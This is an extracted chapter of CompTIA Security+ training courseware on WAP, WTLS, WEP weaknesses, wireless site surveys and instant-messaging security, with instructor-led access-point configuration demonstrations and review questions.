Explanation The Wireless Application Protocol (WAP) is an open, global specification that is designed to deliver information and services to users of handheld digital wireless devices, such as mobile phones, pagers, personal digital assistants (PDAs), smart phones, and two-way radios. Its designed to be compatible with most wireless networks including CDPD, CDMA, DataTAC, DECT, FLEX, GPRS, GSM, iDEN, Mobitex, PDC, PHS, TETRA, TDMA, and ReFLEX. WAP can be built on any operating system including PalmOS, EPOC, Windows CE, FLEXOS, OS/9, and JavaOS. WAP was developed by the WAP Forum to provide open protocol specifications to enable access to the Internet across different transport options and on many devices. The WAP Forum was founded in 1997 by Unwired Planet (now Phone.com), Ericsson, Motorola, and Nokia. The WAP Forum no longer exists as an independent organization. The Open Mobile Alliance (OMA) now includes the WAP work (www.openmobilealliance.org/tech/affiliates/wap/wapindex.html). The WAP Forum is not a standards body, as is the IEEE, but it does work closely with standards bodies such as the IEEE, W3C, ETSI, TIA, and AMIC. The WAP Forum currently has a member list of over 230 companies, made up of handset manufacturers, carriers, software developers, and other companies. Its board of directors comprises industry representatives from Motorola, Sprint PCS, Ericsson, IBM, Intel Corporation, Microsoft, NEC Corporation, Nokia, NTT DoCoMo, Sun Microsystems, Texas Instruments, Vodafone, and others. Like the IEEE, the WAP Forum has formed various working groups to focus on different aspects of wireless data communication and mobile commerce (m-commerce). The WAP Forum was formed in the middle of a meteoric rise in the use of mobile phones and the Internet. As the major mobile phone companies saw their markets start to saturate, particularly in Europe and Asia, they realized that, if they were to continue their rapid growth, they would need to add new features and services to their phones. The idea of bringing the Internet to handheld devices was very appealing. Unlike traditional Internet users that view content-rich Web material on large screens using computers equipped with high-speed processors, large amounts of memory, and keyboards over telephone and high-bandwidth access lines such as cable and T1 lines, mobile device users would be constrained by the need to use handheld devices. As shown in Exhibit 8-1 and Exhibit 8-2, these devices have very small viewer screens, clumsy user interfaces (only number keys in the case of a mobile phone), much slower processors, limited memory, and much lower bandwidth (typically only 9600 bps). In order for mobile device users to gain access to the Internet, significant changes needed to be made.

Wireless and instant messaging

811

Exhibit 8-1: Sanyo Sprint SCP-6000 WAP-enabled phone

Exhibit 8-2: Handspring Treo 270 WAP-enabled communicator

812

CompTIA Security+ Certification

The WAP 1.x stack


Like data transmissions between wired network devices, wireless devices need to be able to communicate with data sources over a network. With the slow processor speeds of handheld devices and the latency caused by limited bandwidth, the WAP Forum needed to modify the OSI Model and create its own set of protocols called the WAP stack. Once you have an understanding of the components of the WAP stack, you can discuss how a WAP-capable client (usually a wireless phone, communicator, or PDA) requests and receives information over the Internet. Comparison to the OSI model WAP 1.x was based as closely as possible on the OSI Model so it could interact with the Internet, but there are some significant differences between the two. The following table compares the WAP 1.x stack to the OSI stack. Notice these layers do not correspond exactly together and that the table is simply a conceptual tool to help you understand some of the similarities and differences between the two models. Some of the most notable differences are: There are five layers in the WAP 1.x stack that would lie within the top four (of seven) layers of the OSI Model. The transaction and security layers of the WAP 1.x stack are new. (Although one could conceptually place SSL and TLS here, those protocols are actually Session and Application layer protocols in the OSI model.) No network layer exists, as WDP at the Transport layer performs many of these functions in combination with the Bearer protocols. WAP is much leaner than the OSI Model in that each of its protocols has been created to make data transactions as compressed as possible and to allow for many more dropped packets than the OSI Model.
Layer Application Session Transaction Security Transport Lower layer(s) WAP 1.x Wireless Application Environment (WAE) Wireless Session Protocol (WSP) Wireless Transaction Protocol (WTP) Wireless Transport Layer Security (WTLS) Wireless Datagram Protocol (WDP) Bearers (GPRS, TDMA, CDMA, and so on) SSL/TLS TCP/IP, TCP/UDP IP, Data Link layer, Physical layer OSI/Web HTML, JavaScript, and others HTTP

Wireless and instant messaging

813

These protocols were based on the International Organization for Standardization OSI Model, but were different enough from it to require that data communications between clients (wireless devices) and servers pass through a WAP gateway, which in effect converts the data from one type of network protocol to another. The Wireless Application Layer (WAL) corresponds to the HTML layer, but unlike the HTML layer, which allows for a wide variety of content formats that can consume large amounts of processing power and be displayed on large computer screens, WAE was designed only to specify lightweight formats, such as text and image formats, and to leave decisions related to browser types, phonebooks, and the like to device vendors. The Wireless Session Protocol (WSP) provides connection- and connectionlessoriented session standards that require a relatively limited amount of information exchanges between the wireless device and the server compared to the number of information exchanges required between a wired device and the server. Connection-oriented session services that require reliable data transmission operate over the Wireless Transaction Protocol (WTP) layer while connectionless-oriented session services operate over the Wireless Datagram Protocol (WDP). The WTP operates over the WDP or the optional WTLS layer. This layer allows for either reliable or unreliable transactions and, like other WAP 1.x layers, has been designed to limit the number of transactions necessary to allow data transport, relative to the number of transactions necessary in the OSI/Web stack. The Wireless Datagram Protocol (WDP) is the bottom layer above the carrier layer. WDP differs greatly from the UDP layer of the OSI/Web stack in that it allows operability of a great variety of mobile networks while the UDP layer must operate over an IP network. Another significant difference between wireless and wired data transfer lies in the network architectural structures of the two network types. Exhibit 8-3 illustrates the differences between a WAP network and a wired networks architecture.

Exhibit 8-3: WAP vs. wired network

814

CompTIA Security+ Certification

WAP 1.x security


To gain access to information on the application server, the WAP client (a WAPenabled mobile phone, PDA, and so forth) must take the following steps: 1 The client first makes a connection with the WAP gateway and then sends a request for the content that it wants using WSP. (WSP is similar to HTTP, but its overhead is much smaller than that of HTTP.) 2 The gateway then converts the request into the HTTP format and forwards it to the application server. 3 The application server then sends the requested content back to the WAP gateway. 4 The gateway converts the data using WSP, compresses it, and sends it on to the WAP client. If the WAP client has enabled the Wireless Transport Layer Security (WTLS) protocol (the WAP security protocol discussed shortly), then the data is encrypted between the WAP client and the WAP gateway. WAP 1.x does not require the use of WTSL. If it is not enabled, then all of the data is transmitted to and received from the WAP gateway in plaintext. WAP 2.0 employs TLS rather than WTLS so no conversion is necessary. The data is also encrypted using the Transport Layer Security (TLS) protocol, however, while the WAP gateway is converting the data from WSP to HTTP, and vice versa, there is a brief instantmillisecondswhen the data is not encrypted at all. This moment is referred to as the WAP gap, and it has raised a lot of criticism for WAP in the past year or so. Financial services companies were particularly concerned by this flaw, and many of them chose to set up their own WAP gateways to ensure they had adequate control over who had access to the data while it was in plaintext. The possibility of anyone being able to capture this data and use it maliciously is quite small, but there is still a risk. A hacker would have to have physical access to the WAP gateway, which is usually located within secure premises to ensure that billing information is kept secure. In addition, a hacker would have to sift through all of the traffic pouring through the gateway at an exact moment. Adding to the difficulty is the fact that packets passing through the WAP gateway are never saved, even briefly, in any type of storage mechanism. The whole transaction takes place in flash memory.

Wireless and instant messaging Do it!

815

B-1:

Discussing WAP 1.x

Questions and answers


1 The WAP 1.x stack Security layer is similar to which of the following?
A

SSL/TLS HTML TCP IP

B C D

2 The WAP 1.x lower layer is similar to what layers of the OSI Model? (Choose all that apply.)
A B C

IP Data link Physical Security

3 WAP is a proprietary encryption protocol that was created by WECA. True or false?
False: It was created by the WAP Forum.

4 Where does the WAP gap occur? A


B

In the WAP client In the WAP gateway Between the WAP client and the application server Between the WAP gateway and the application server None of the above

C D E

816

CompTIA Security+ Certification

The Wireless transport layer security protocol


Explanation In addition to security threats posed by the WAP gap, there have also been a number of proven attacks publicized about the Wireless Transport Layer Security (WTLS) protocol that WAP 1.x employs. Before these flaws are discussed, however, you should understand what WTLS is and how it works. WTLS was designed to provide authentication, data encryption, and privacy for WAP 1.x users. As mentioned, mobile devices have much less memory, computational resources, and battery power than traditional computers. They also experience much greater latency (the time it takes for the data to arrive and be processed) because they send and receive data at a much, much slower rate than computers. If you were using 9600-baud modems back in the early to mid-1990s, perhaps you remember how long you had to wait for a Web page to download. That is about where data transmission rates are now for mobile devices. For these reasons, the WAP Forum chose to develop a scaled-down version of TLS that does not require as much processing power, memory, or battery life. Authentication WTLS allows for three different classes of authentication: Class 1 authentication is anonymous and does not allow either the client or the gateway to authenticate the other. Class 2 authentication only allows the client to authenticate the gateway. Class 3 authentication allows both the client and the gateway to authenticate each other. Class 3 authentication requires the use of a Wireless Identity Module (WIM). A WIM is a tamper-resistant device, such as a smart card, that facilitates the storage of digital signatures and can also perform more advanced cryptography with its enhanced processing power. The WTLS protocol completes Class 2 authentication in four steps, as shown here: 1 Prior to sending a request to open a session with the WAP gateway, the WAP device sends a request for authentication. Its always the client that begins this process, never the WAP gateway. The client can also challenge the gateway again at any time during the session. Both TLS and WTLS differentiate between a connection and a session. A session can exist over many connections. This is especially helpful in wireless communications because connections are not as stable as they are in the wired world. If a connection is broken, the session can continue using the same security mechanisms that were initially established, but its up to the gateway (or server in the case of TLS) to decide whether or not to create a new session with new security parameters. 2 The gateway responds and then sends a copy of its certificate, which contains the gateways public key, to the WAP device. 3 The WAP device then receives the certificate and public key and generates a unique random value. 4 The WAP gateway then receives the encrypted value and uses its own private key to decrypt it.

Wireless and instant messaging

817

This process works quickly, and requires less overhead, largely because WTLS is using weaker keys than TLS, which does not require very much processing time. Remember that in WAP 1.x, WTLS is optional, so it might not even be turned on, and it only encrypts data between the client and the WAP gateway. The WAP gap is still present between the time the gateway has finished decrypting the data and when it encrypts it with TLS before sending it to the application server. SSIDs Another area of concern is the unsafe use of service set identifiers (SSIDs). SSIDs are wireless network names, which are sent with wireless data packets to help devices identify each other in a wireless network. The default SSID values should never be used, nor should SSIDs that help unscrupulous hackers with sniffers to identify your WLAN. These would include such SSIDs as 12th Street Branch Accounting Department or ABC Consulting Firm. Giving your wireless devices more cryptic SSIDs help reduce the likelihood that a hacker will be able to compromise your WLAN(s). Weak encryption keys The weak key used by WTLS has been widely criticized. Some WAP supporters have responded to these criticisms by arguing that the shortcuts taken in WTLS were necessary in order for WAP to adapt to the wireless environment. These weaknesses are real and should be considered when transmitting sensitive information using a WAPenabled device. Although many vendors have already made improvements to WAP 1.x-enabled devices with higher levels of encryption and more efficient processing, it cannot be emphasized enough that WTLS cannot be taken for granted even if the vendor has made these improvements, or even if they simply state that their application incorporates WTLS.

818

CompTIA Security+ Certification

The WAP 2.0 stack


In January 2002, the WAP Forum released the Wireless Application Protocol (WAP 2.0) Technical White Paper. This paper specified a new suite of utilities and security enhancements. One of these security enhancements was the release of a new WAP stack that eliminates the use of WTLS and instead relies on a lighter version of TLS, the same protocol used on the common Internet stack, which allows end-to-end security and avoids any WAP gaps. In response to the emergence of higher-speed wireless networks, all of the other layers of WAP 1.x are also replaced by standard Internet layers, which will make wireless data transactions much more efficient. WAP 2.0 still supports the WAP 1.x stack in order to facilitate legacy devices and systems. A comparison of the WAP 1.x and WAP 2.0 stacks is provided in Exhibit 8-4.

Exhibit 8-4: A comparison of WAP 1.x and 2.0 stacks In addition to these changes, WAP 2.0 has added a number of features. These include, but are not limited to: WAP Push Allows content providers to send information, such as stock prices and advertisements, directly to the WAP device without being requested to do so. User agent profile Allows a way to capture and communicate WAP device capabilities and user preferences. Wireless Telephony Application Provides a range of advanced telephony applications including such call-handling services as making, answering, placing, or redirecting calls. External Functionality Interface (EFI) Allows the use of plug-and-play modules to extend the features of the clients applications. It also allows the addition of smart cards, GPS devices, health care devices, and digital cameras. Multimedia Messaging Service (MMS) Provides a framework to enable a richer messaging solution.

Wireless and instant messaging Do it!

819

B-2:

Discussing WTLS protocol and WAP2.0

Questions and answers


1 WTLSs Class 2 authentication only allows the client to authenticate the gateway. True or false?
True

2 WTLSs Class 3 authentication requires the use of a tamper-resistant device called a ________________________________________.
Wireless Identity Module (WIM)

3 Put the steps below in the correct sequence to describe a Class 2 authentication. ___ The client generates a unique random value and encrypts it with the public key. ___ The gateway sends a copy of its certificate containing its public key. ___ The client sends a request for authentication to the gateway. ___ The gateway decrypts the encrypted value with its private key. 4 What are SSIDs?
SSIDs are wireless network names, which are sent with wireless data packets to help devices identify each other in a wireless network. 3

2 1 4

5 WAP 2.0 uses which of the following as its security protocol? A B


C

TCP SSL TLS WTLS STP

D E

820
Do it!

CompTIA Security+ Certification

B-3: Controlling access to the WAP (demonstration only) Heres how Heres why
The Access Point is designed to be functional right out of the box. To implement greater security on your wireless network, you will use Linksyss Web-based configuration utility. (For example, http://192.168.1.251.) The system prompts you for a user name and password.

Introduce this activity as a demonstration. Students should observe only. Steps 1-13 should be done on the Instructors computer.

1 From the Instructors computer, open Internet Explorer

2 In the Address field, enter http:// followed by the IP Address of your Linksys WAP 3 Leave the user name blank In the Password field, enter
admin

Click OK

The configuration utility with the Setup tab active appears. This tab allows you to change the Access Points general settings.

4 Review the settings but leave the AP Name, LAN IP Address, and AP Mode settings at their default values

The AP Name and LAN IP Address were set during the initial setup.

The AP Mode is set to Access Point by default. This connects your wireless PCs to a wired network.

Wireless and instant messaging

821

To communicate with another Wireless Access Point, you have two options: (1) If within the same network, choose Access Point Client. This will make this WAP a client to the other WAP. (2) If you want to connect two networks together, select Wireless Bridge. This will make the connection to another access point set as a wireless bridge. In both cases, you would specify the other WAP MAC address. To connect three or more networks together, choose Wireless Bridge-Point to MultiPoint. 5 Activate the Password tab

6 Enter a new password Re-enter the new password to confirm 7 Click Apply 8 Enter the new password and click
OK To avoid using the default password. Be sure to choose a complex password. To save the change. To return to the utility

9 Activate the Advanced tab

The Filter tab appears. One method of restricting wireless devices is to create a list of approved users. A list of preapproved media access control (MAC) addresses can be entered into the Filtered MAC Address table in the access point. Only those stations on the ACL will be provided admittance. The Linksys WAP11 provides an option to create and manage an ACL.

10 Select Enabled

Filtering is enabled.

822

CompTIA Security+ Certification 11 Select Only deny PCs with


MAC listed below to access device This will set the MAC Address list to deny listed PCs. The software allows up to 50 MAC Addresses to be specified. If you need to enter more than 10, click on the pull-down menu above the MAC Address fields. Do not use dashes as you enter the address. The MAC Address can be obtained by running ipconfig /all on the PCs command screen. To save the changes. Notice that you'll see a Continue button; it's not necessary to click Continue; the program will return to the previous page automatically.

12 In the MAC 01 field, enter the MAC Address of the wireless adapter in the computer with the wireless adapter (laptop or desktop) 13 Click Apply

This step and the next are done on the computer with the wireless network adapter.

14 From the computer with the listed MAC Address, load Internet Explorer 15 Enter the IP Address of the WAP in the Address field
The page fails to load.

This step is done on the instructors computer.

16 On the Filters tab on the Instructors PC, select Only


allow PCs with MAC listed below to access device

In the MAC 01 field, enter the MAC Address of the wireless adapter in the computer with the wireless adapter Click Apply
This step and the next are done on the computer with the wireless network adapter.

17 From the computer with the listed MAC Address, retry to access the WAP using its IP Address

The page successfully loads.

Wireless and instant messaging

823

Topic C: Wired equivalent privacy


This topic covers the following CompTIA Security+ exam objective:
# 2.6 Objective Recognize and understand the administration of the following wireless technologies and concepts WEP / WAP (Wired Equivalent Privacy / Wireless Application Protocol) Vulnerabilities Site Surveys

Introducing WEP
Explanation Wired Equivalent Privacy (WEP) is the optional security mechanism that was specified by the 802.11 protocol to provide authentication and confidentiality in a wireless LAN (WLAN) environment. Even though the IEEE committee recommended that WEP should be used, it also stated that WEP should not be considered adequate security and strongly recommended that it should not be considered without also implementing a separate authentication process and providing for external key management. Before delving into WEP, however, you must first gain an understanding of what a WLAN is and how it operates. A WLAN works to connect clients to network resources using radio signals to pass data through the atmosphere, as depicted in Exhibit 8-5.

Review with students the operation of a typical wireless LAN as depicted here. Notice that critical resources, such as servers and internetwork devices, are still connected using wired technologies so WLANs are frequently really hybrids that incorporate both wired and wireless components.

Exhibit 8-5: Conceptual diagram of wireless LAN

824

CompTIA Security+ Certification In order to do this, it employs wireless access points (AP), as shown in Exhibit 8-6, which are connected to the wired LAN and act as radio broadcast stations that transmit data to clients equipped with wireless network interface cards (NICs), as shown in Exhibit 8-7.

Exhibit 8-6: Netgear ME 102 802.11b Access Point

Exhibit 8-7: 3 Com AirConnect wireless NIC This allows users to stay connected to the network as they move around from place to place within and between the broadcast zones of the various access points (APs) within the WLAN. WLANs use WEP to encrypt and guarantee the integrity of the data passed between the client and the AP and to authenticate clients that are requesting network resources.

How WEP works


WEP uses a symmetric key (a shared key) to authenticate wireless devices (not wireless device users) and to guarantee the integrity of the data by encrypting the transmissions. Each of the APs and clients needs to share the same key in order for this to happen effectively. When a client wants to send data to or request resources from the network, it sends a request to the AP asking for permission to access the wired network. If WEP has not been enabled, and by default it is not, then the AP allows the request for resources to pass through to the wired LAN. If WEP has been enabled, then the client begins a challenge-and-response authentication process.

WEPs weaknesses
WEP has been criticized for having many problems, including problems related to the initialization vector (IV) that it uses to encrypt data and ensure its integrity, and also problems with how it handles keys.

Wireless and instant messaging Initialization vector concerns

825

An IV is a sequence of random bytes that have been appended to the front of the data, which is in plaintext before encryption. There are several problems with the IV: WEP sends the IV in plaintext across the WLAN and, therefore, it can be picked up by a hacker along the way. The WEP IV is only 24-bits long, which means that it can only take 224 (16,777,216) values. The IV is reused on a regular basis. An individual could capture packets and see the pattern of reuse, thus revealing the IV. Researchers have actually broken the 128-bit WEP encryption in as little as two hours using this method. In August 2001, Fluhrer, Mantin, and Shamir published a paper titled Weaknesses in the Key Scheduling Algorithm of RC4. In it, they described an attack that could be made using weak keys created by WEPs IV. They also criticized the fact that the RC4 stream cipher, though effective in many other instances, is rendered useless in WEP because it encrypts messages by concatenating a fixed secret key and known IV modifiers. Key sharing Others have criticized WEP for not requiring asymmetric authentication in which each wireless device would employ its own secret key. At this point, every wireless device in a WLAN shares a common secret key, which means the likelihood of that key getting into the hands of someone who wishes to harm the organization is increased. For example, standard WEP requires the secret keys be manually configured. Rational security implementation then dictates the secret key be changed on every device every time someone leaves the company, if not more frequently, but this would be an administrative nightmare in large organizations. A symmetric key system, in itself, does not do anything to protect critical information from authorized WLAN members who can, intentionally or unintentionally, gain access to resources to which they are not authorized access. Another weakness related to the difficulty associated with rekeying is that if it is not done regularly, hackers have even more time to break into the system. War driving and other issues In addition to the WEP related problems that have been discussed so far, wireless LANs have other security holes. For example, WLAN transmissions can, and often do, extend beyond the confines of the physical structures of the organizations that use them, unlike wired LANs, its much, much easier for people to detect and capture them. Several articles, in such widely read publications as PC Magazine and the Wall Street Journal, describe the amount of information about an 801.11b WLAN that can be collected through war driving. War driving involves driving around using a laptop equipped with a wireless card and an antenna. Craig Ellison wrote an article for PC Magazine in 2001 that described how he was able to use this method to detect 61 APs within a six-block radius of the Ziff Davis office in Manhattan. Of these, only 21% of the networks had actually enabled WEP. The other 79% were broadcasting their transmissions out in plaintext for anyone to pick up. On other war driving trips through Jersey City, Boston, and the Silicon Valley, Ellison easily found 808 networks and only 38% of them were using WEP.

826

CompTIA Security+ Certification In addition to war driving, which is a fairly passive activity, unauthorized users can attach themselves to WLANs and use their resources, set up their own access points, and jam the network in a denial-of-service attack, or use the previously mentioned WEP weaknesses to break into wired LANs by attaching themselves to WLANs that are not separated from the wired LAN by a DMZ. WEP authenticates clients, not users. Unless an additional security method is employed, such as requiring users to provide username/password sets, anyone who gains access to a client that has the shared key is able to break into the system. 802.11i will help in this area, but perhaps the greatest need is in the area of educating wireless network administrators and users about the inherent insecurity of wireless systems and the need for additional care when using them.

WEP key
The 802.11 standard provides an optional Wired Equivalent Privacy (WEP) specification for data encryption between wireless devices to increase privacy and prevent eavesdropping. The access point and each station can have up to four shared keys. Each key must correspond to the same key position in each of the other devices.

Wireless and instant messaging Do it!

827

C-1: Generating a WEP key (demonstration only) Heres how Heres why

Introduce this activity as a demonstration. Students should observe only.

1 In the Linksys utility, activate the Setup tab 2 Select Mandatory

3 Click WEP Key Setting

The WEP Key Setting window appears. This window allows you to set WEP encryption.

4 Select 128Bit encryption Leave the Mode set to HEX 5 In the Passphrase field, enter
Paganini1 Your screen should look like this:

Each point in your wireless network MUST use the same WEP encryption method and encryption key or else your wireless network will not function properly.

828

CompTIA Security+ Certification 6 Click Generate


The system will generate four WEP encryption keys based on the passphrase.

7 Click Apply 8 Close the window 9 Click Backup Save the file to your local hard drive 10 Click Apply 11 At this point, you would configure each device in your wireless network with the same configuration and encryption keys. 12 On the Setup window, select Disable under WEP 13 Click Apply

To save the changes. To return to the Setup tab. To store the Access Point configuration on your local PC.

To complete the setup. Automated key generation can only be done when the network adapter is the same brand and model as the WAP. If not, you would need to manually enter the encryption keys in each wireless device. To disable encryption.

Wireless and instant messaging Do it!

829

C-2:

Understanding wired equivalent privacy

Questions and answers


1 Why is the initialization vector in WEP considered a security concern?
WEP sends the IV in plaintext across the WLAN, and it can be picked up by a hacker
along the way

It is only 24 bits long It creates weak keys It is reused on a regular basis, allowing the hacker to see the pattern of reuse

2 Describe war driving.


This is the act of using a laptop and an antenna to locate wireless networks around town.

3 WEP authenticates users, not clients. True or false?


False: WEP authenticates clients.

830

CompTIA Security+ Certification

Conducting a wireless site survey


Explanation Conducting a wireless site survey is a critical part of designing and implementing a wireless network. It involves understanding the number and requirements of the people who will be served by the network and the physical environment in which the network will be deployed. Preparing for and conducting a site survey allows you to discover how many access points you will need and where they should be placed to provide adequate coverage throughout the facility. The basic steps to conduct a site survey are: 1 Conduct a needs assessment of the network users. 2 Obtain a copy of the sites blueprint. 3 Do a walk-through of the site. 4 Identify possible access point locations. 5 Verify access point locations. 6 Document your findings. The amount of time and energy this process takes depends on the size and shape of the facility and the number and requirements of the users. A larger organization requires more careful analysis of the site, and it might take days or even weeks to conduct a site survey. A site survey of a smaller organization might only require a few hours. Conducting a needs assessment of the network users In this step, its important to gain an understanding of the number of people that the WLAN will serve as well as their data access needs. On the one hand, you might discover there are only a few people who will use the WLAN and that they will not be heavy users of network resources. For example, a small group of upper-level executives who only want to take their laptops with them when they walk down the hall from their offices to the company boardroom. On the other hand, you might discover that almost everyone in a large organization needs to be able to move frequently from one place to another and that each employee is a heavy user of network resources. This might be the case in an engineering firm in which users are part of multiple project teams that need to work together for limited periods of time and then move on to their next project with another group of people. In either case, its important for you to understand both where the users will use their wireless laptops or other devices and how much bandwidth they will need to perform their jobs. Its also important to know if there are any plans to dramatically increase or decrease the number of mobile users. Obtaining a copy of the sites blueprints Radio waves are difficult to predict. An initial understanding of the sites physical layout can give you an idea of how best to place access points so that adequate wireless coverage is provided to mobile users. Like wired networks, wireless LANs also have barriers to the pathways that the radio signals can travel, and you need to know this so you can work around the barriers. One of the best ways to gain this understanding is to obtain a copy of the sites blueprints or, if none are available, create your own floor plan. In this step, you want to notice the position of walls, walkways, elevator shafts, and the locations of any other structural elements that might present challenges to adequate access point coverage.

Wireless and instant messaging

831

Pay particular attention to materials used to construct the walls, floors, and ceilings of the building. Certain materials tend to reflect some of the signal. Concrete, marble, brick, water, and especially metal are difficult to work around. Doing a walk-through of the site After getting an idea of the layout of the site from the blueprints, its important that you walk through the site to make sure the blueprints are accurate and to identify any other barriers that might affect radio signals. For example, you might notice that partitions, metal racks, or file cabinets have been placed in areas that originally appeared to be wide open. As you walk through the site, you need to identify other devices that operate in the same radio frequency band as your WLAN, such as microwave ovens, medical equipment, military communications equipment, and baby monitors. You also want to observe whether or not there are existing wired network jacks and power outlets that you can use to connect to the physical network and provide electricity to your access points. You might need to determine in which areas of the building it might not be esthetically pleasing to locate an access point and plan to make concessions for that space (such as the company boardroom). Identifying possible access point locations Using the information you have gained in the preceding steps, you should be able to approximate the locations of the access points that will provide adequate coverage for mobile users. Areas that have high concentrations of mobile users require more access points; however, you also need to be mindful of not placing access points too close together in order to reduce interference between access points. You should also have noticed where physical network jacks and electrical sockets need to be installed. Consider the power needs of the wireless workstations that will be in each area and the different types of antennas that might be needed in different spaces. Confirm that environmental conditions are good (not too hot or too cold). Once all of this information has been taken into account, you need to create a draft design of the network from which to work as you go through the next step. Verifying access point locations Before you finalize your network plans, you need to verify your initial approximations of AP location are correct. To do this, you need the proper tools, including at least one access point (and a power cord to connect it to a source of electricity), a laptop equipped with a wireless NIC, and software that can be used to identify the AP and monitor data rates, signal strength, and signal quality. Most wireless equipment vendors include this software with the AP or the wireless NIC, but you can also download free software from wireless LAN vendors, such as Cisco, 3Com, and Symbol. Some vendors provide you with software that not only tests your signal strength, but also provides you with a printout of the results, which will be helpful in your posttest documentation.

832

CompTIA Security+ Certification Once you have gathered all of the appropriate tools, you are ready to begin testing. 1 With your draft design in hand, go to each of the points that you have identified as potential good locations for an AP, place the AP in those locations, and monitor the site survey software to see what the results are as you walk around the intended space. 2 You should also test for the amount of data throughput that is possible at various points in the space. 3 Take detailed notices of these results and identify where you find strong and weak signals. 4 If you are finding weak or dead spots, you need to reposition the AP until you have full coverage of the space. In some cases, you might not find an ideal location and will need to consider adding an additional access point in a location to solve the problem. Documenting your findings Now that you have tested your initial assumptions about AP locations and made any adjustments that were necessary, you need to document your findings. Your final plan will allow for adequate wireless coverage in any area that the users indicated they would need it. Careful drawings should be made and a list of your assumptions should be spelled out. The people who will install the wireless system that you have designed will use your documentation, as might the network administrators who will support the wireless network. In addition, a great amount of time, energy, and money will be saved in the future if the network needs to be upgraded or expanded, as long as your documentation is precise and thorough.

Wireless and instant messaging Do it!

833

C-3:

Performing a site survey (demonstration only) Heres why

Heres how
Introduce this activity as a demonstration. Students should observe only. For this activity, you will need a laptop with a Netgear MA401 PC Card installed. If the Wireless Status icon is not displayed in the system tray download and install the latest version of the Netgear MA401 driver.

1 On the laptop computer, click the Wireless Status icon


A drop-down menu appears.

If you have a different wireless network card, you can right-click the wireless connection icon in the system tray and choose Status. The screens will look different than those shown here, but will have similar information.

2 Choose Wireless Network


Status

The Status screen appears.

3 Monitor the following output: Current Tx Rate Signal Strength Link Quality

Ask a student to roam about the room and identify any objects that influence the signal strength and quality.

4 Roam around the room with the laptop and watch for any changes in transmission rate, signal strength, and link quality

834
Do it!

CompTIA Security+ Certification

C-4:

Reviewing the wireless site survey

Questions and answers


1 What are the steps needed to conduct a wireless site survey?
The basic steps to conduct a site survey are: 1 Conduct a needs assessment of the network users. 2 Obtain a copy of the site's blueprint. 3 Do a walk-through of the site. 4 Identify possible access point locations. 5 Verify access point locations. 6 Document your findings.

2 Why is it important to document your findings when conducting a wireless site survey?
The documentation is important to communicate your findings in the wireless site survey. The people who will install the wireless system that you have designed will use your documentation, as will network administrators. Its essential to have this information for support purposes on the wireless network. In addition, a great amount of time, energy, and money will be saved in the future if the network needs to be upgraded or expanded, as long as your documentation is precise and thorough.

Wireless and instant messaging Do it!

835

C-5:

Resetting the WAP (demonstration only) Heres why

Heres how
Introduce this activity as a demonstration. Students should observe only.

1 In the Linksys utility, activate the Password tab 2 At Restore Factory Defaults, click on Yes

3 Click Apply

To save the changes. The system warns that your connection might be lost.

4 Click Continue 5 Close Internet Explorer

To proceed to reset the WAP to the factory defaults. Your connection will be terminated.

836

CompTIA Security+ Certification

Topic D: Instant messaging


This topic covers the following CompTIA Security+ exam objective:
# 2.3 Objective Recognize and understand the administration of the following Internet security concepts Instant messaging Vulnerabilities Packet Sniffing Privacy

A definition of IM
Explanation With the proliferation of instant messaging (IM) products comes an equal proliferation of problems and security threats. Five currently available and frequently used flavors of IM include: AOL Instant Messenger (AIM), MSN Messenger, Yahoo! Messenger, ICQ, and Internet Relay Chat (IRC). Each of the five has suffered at least one major security problem. In addition to the security problems inherent in each product, there is also a series of generic problems that a technology manager faces when trying to lock down IM. Unlike e-mail, which uses a store and forward model, IM uses a real-time communication model. When you type a message into an IM client and press the Enter key, the text of that message is immediately sent to the client(s) to which you are currently connected. This model makes IM easy, fast, and extremely dangerous. IM networks operate in either peer-to-peer or peer-to-network configuration. In the peer-to-peer model, client software communicates directly with one another; in the peerto-network model, client software logs onto a network, which then transfers the messages between clients. Both models have pros and cons. The peer-to-peer model does not rely on a central server; so as long as two client software packages are not blocked, they can communicate with one another. This model might cause the client to expose sensitive information such as the actual IP address of the machine on which it is running. The peer-to-network model relies on a central server (or group of servers) and, therefore, there is a risk of a network outage making IM communication unavailable. In addition, denial-of-service (DoS) attacks are becoming more frequent, and this increases the likelihood that IM might not be available when you need it.

IM security issues
The instant messenger client is typically installed on an end-users workstation and provides an interface for end-users to communicate with each other by utilizing the server resources. The server manages and relays all end-user communication and is typically maintained by a service provider such as AOL, Yahoo!, or Microsoft. The server is also responsible for the authentication and notification of user status and availability.

Wireless and instant messaging


Ask students if they can think of some applications for IM within the work place. Answers might include helpdesk support, remote meetings, and file transfer.

837

Increased deployment of broadband networks, as well as availability of extra capacity in many networks, make instant messaging tools a very popular way of communication both at home and in the work place. The increased usage of these tools also brings about certain vulnerabilities that many organizations fail to understand and address. Many of these services, although very convenient, do not have the security and encryption features that are essential for transportation of sensitive and confidential data. There are serious security concerns regarding the usage of consumer IM systems because these systems can transport sensitive and confidential data over the public networks in an unencrypted form. Corporations have no control over data transported in such fashion once it leaves the corporate network infrastructure. On the other hand, enterprise IM systems are administered in-house, making them considerably more secure than the consumer IM systems. Most popular consumer IM systems share some common security risks that need to be addressed: IM systems typically do not prevent transportation of files that contain viruses and Trojan horses. Such files can spread these dangerous viruses and cause systems to malfunction or cease to function altogether. Misconfigured file sharing can provide access to sensitive or confidential data including personal data, company information, and system passwords. The most visible security risk associated with most IM systems is the lack of encryption. Such applications transfer data in plain HTML format, which can easily be intercepted by an intruder. Sensitive information should always be encrypted and digitally signed before transporting over a public network. The use of a plaintext session can also lead to the session being hijacked, which can be further exploited to obtain sensitive information. IM systems could be utilized for transportation of copyrighted material, which could have substantial legal consequences. These include copyrighted pictures, documents, music files, software, and so forth. Transferring files also reveals network addresses of hosts, which could be used by attackers for malicious purposes such as a Denial-of-Service attack. IM applications typically do not use well-known TCP ports for communication and file transfers; instead, registered ports are used: AOL Instant Messenger uses TCP port 5190 for file transfers and file sharing, but transportation of IM images takes place on TCP port 4443. NetMessenger uses TCP port 1863 for transportation of HTML-encoded plaintext messages. Voice and video feed is relayed via a direct UDP connection on ports 13324 and 13325. Application sharing takes place between clients over TCP port 1503, and file transfers use TCP port 6891 on the initiator or client. Yahoo!s Messenger typically uses TCP port 5050 for server communication and TCP port 80 for direct file transfers. ICQ messages are also unencrypted and sent via TCP port 3570, and voice and video traffic uses UDP port 6701.

838

